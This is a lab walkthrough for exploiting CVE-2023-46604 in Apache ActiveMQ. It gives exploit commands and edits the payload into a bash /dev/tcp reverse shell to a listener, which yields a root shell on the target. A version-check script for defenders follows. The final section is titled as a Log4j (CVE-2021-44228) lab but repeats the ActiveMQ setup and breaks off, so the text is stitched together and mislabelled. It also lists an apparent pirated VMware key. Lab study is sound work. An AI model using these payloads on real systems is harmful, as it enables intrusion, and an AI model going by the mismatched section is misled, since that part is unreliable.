CVE-2023-46604 Lab
This lab is a guide to exploiting CVE-2023-46604 in Apache ActiveMQ.
Acknowledgements
Environment
This lab requires two virtual machines: one Kali Linux machine, version 2023.4, and one Ubuntu machine, version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for Windows
- VMware-workstation-17.5.0 for Linux
- Key active VMware 17 Pro
Documentation
Model and system requirements
On Kali Linux machine:
- Install git
$sudo apt install git
- Install gedit
$sudo apt install gedit
- Install python (already available on Kali Linux)
- Install Netcat (already available on Kali Linux)
On Ubuntu machine:
- Install git
$sudo apt install git
- Install openjdk 18
$sudo apt install openjdk-18-jdk
- Install ActiveMQ 5.18.2 package
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
Exploiting
Step 1: Launch the activemq service on the Ubuntu machine
Open a terminal window and run the commands below:
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
Check the status of the service:
$./activemq status
If the service starts successfully, the terminal displays "ActiveMQ Broker is running".
You can also visit http://127.0.0.1:8161 to open the ActiveMQ broker manager. It shows the hostname, version, ID, uptime and some other information.
Step 2: Set up the attack on the Kali Linux machine
Download the resources for the exploit:
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
As you can see, we have two files, exploit.py and poc.xml:
- The poc.xml file contains a piece of malicious code that takes advantage of a vulnerability in the OpenWire protocol.
- The exploit.py file is responsible for encoding the HTTP location of the poc.xml file and sending it to the broker on the target machine.
Start a web server in the resource directory:
$cd CVE-2023-46604
$python3 -m http.server
Open a new terminal window to send the poc.xml file to the target's server via the exploit.py file:
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
After the command is executed, the Calculator application launches on the target machine, which proves that the vulnerability has been successfully exploited. Next, we create a reverse shell to control the target machine.
Open a new terminal window to listen for reverse shell connections:
$sudo su
$nc -nlvp 4444
Return to the previous terminal and edit the poc.xml file:
$gedit poc.xml
Replace the value gnome-calculator with bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 and save the file.
Send the malicious code again:
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
As a result of this command, we obtain a root shell on the target machine. The shell is root because the broker was started from a root shell (sudo su) in Step 1.
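For the defender's side of this lab, the check below classifies a broker version against the releases that fix CVE-2023-46604 (5.15.16, 5.16.7, 5.17.6 and 5.18.3). It is an added example, not part of the lab's repositories; the function names are hypothetical, and it assumes the install directory keeps its tarball name, as apache-activemq-5.18.2 does above.

```sh
#!/bin/sh
# Added example (not from the lab repositories): classify an ActiveMQ 5.x
# version against the releases that fix CVE-2023-46604.
# Fixed releases per the Apache advisory: 5.15.16, 5.16.7, 5.17.6, 5.18.3.

# Hypothetical helper: print vulnerable, patched or unknown for MAJOR.MINOR.PATCH.
activemq_46604_status() {
    version=$1
    # Reject anything that is not digits separated by single dots.
    case "$version" in
        ''|*[!0-9.]*|.*|*.|*..*) echo unknown; return 0 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $version            # split on dots into $1 $2 $3
    IFS=$old_ifs
    [ $# -eq 3 ] || { echo unknown; return 0; }
    major=$1; minor=$2; patch=$3
    # Only the 5.x line is covered here; other majors are reported as unknown.
    [ "$major" -eq 5 ] || { echo unknown; return 0; }
    case "$minor" in
        15) fixed=16 ;;
        16) fixed=7 ;;
        17) fixed=6 ;;
        18) fixed=3 ;;
        *)  # Branches before 5.15 are affected; later 5.x branches ship the fix.
            if [ "$minor" -lt 15 ]; then echo vulnerable; else echo patched; fi
            return 0 ;;
    esac
    if [ "$patch" -lt "$fixed" ]; then echo vulnerable; else echo patched; fi
}

# Hypothetical helper: read the version from a directory named like the
# lab's apache-activemq-5.18.2 (assumes the tarball name was kept).
activemq_version_from_dir() {
    base=$(basename "$1")
    case "$base" in
        apache-activemq-*) echo "${base#apache-activemq-}" ;;
        *) echo "" ;;
    esac
}

# Usage: sh check.sh ApacheActiveMQ/apache-activemq-5.18.2
if [ $# -gt 0 ]; then
    v=$(activemq_version_from_dir "$1")
    echo "ActiveMQ ${v:-?}: $(activemq_46604_status "$v")"
fi
```

Run against the lab's install directory, it reports the 5.18.2 broker as vulnerable; upgrading within the branch to 5.18.3 or later changes the result to patched.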
CVE-2021-44228 Lab
Acknowledgements
Environment
This lab requires two virtual machines: one Kali Linux machine, version 2023.4, and one Ubuntu machine, version 22.04.3 LTS. You can download them here:
- Kali Linux 2023.4
- Ubuntu 22.04.3 LTS
- VMware-workstation-17.5.0 for Windows
- VMware-workstation-17.5.0 for Linux
- Key active VMware 17 Pro
Documentation
Model and system requirements
On Kali Linux machine:
- Installed git
sudo apt install git
- Installed gedit
- Installed python
- Installed Netcat
On Ubuntu machine:
- Installed git
- Installed openjdk 18
- Installed ActiveMQ 5.18.2 package
Exploiting
Step 1: On the Ubuntu machine, launch the activemq service
Support
For support, email dcm240602@gmail.com or txc3000@gmail.com